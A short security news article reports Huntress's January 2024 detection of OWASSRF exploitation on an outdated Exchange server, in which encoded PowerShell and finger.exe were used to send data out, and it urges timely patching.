OWASSRF Exploit Resurfaces with Stealth Data Leak Strategy

Exploitation of the OWASRRF exploit was detected in January 2024 by analysts from Huntress' Security Operations Center. This discovery followed the installation of the Huntress agent on a new endpoint, which immediately flagged a legacy Windows Defender alert for a finger.exe command associated with an IP address previously identified in Huntress' November 2023 incident report. The command aimed to send encoded data, prompting an investigation that uncovered a series of base64-encoded PowerShell commands, alongside a non-encoded command line. These were all designed for unauthorized data transmission using the Windows tool, finger.exe. Despite Windows Defender's intervention, the timing of these commands indicated they likely executed successfully, raising concerns about the endpoint's security before the Huntress agent was deployed.

Further analysis of Windows Event Log and server log data confirmed the link to the OWASRRF exploit, a vulnerability initially analyzed by Huntress’ SOC manager, Dray Agha, along with CrowdStrike and Unit42 in December 2022. The absence of subsequent malicious activity, coupled with the discovery of an outdated MSExchange installation, demonstrates the critical need for addressing and prioritizing software updates and adopting a proactive stance in cybersecurity through threat hunting and implementing cyber intelligence. Huntress security researcher, Harlan Carvey, highlighted the outcome of their analysis, stating, “As there was no follow-on activity identified, it would appear that the commands detected were associated with a scan. Upon verifying that the customer’s version of MSExchange had last been updated in September 2021, we immediately advised the customer on the urgent need for an update.” This statement not only confirms the initial suspicions raised by the SOC team but also serves as a stark reminder of the potential risks posed by neglected system updates.

Initial documentation of the OWASRRF vulnerability in December 2022 revealed its association with Play ransomware attacks. At the time, Agha’s post on X revealed an instance where threat actors utilized the Screen Connect remote access tool for command and control purposes, alongside Mimikatz for credential access.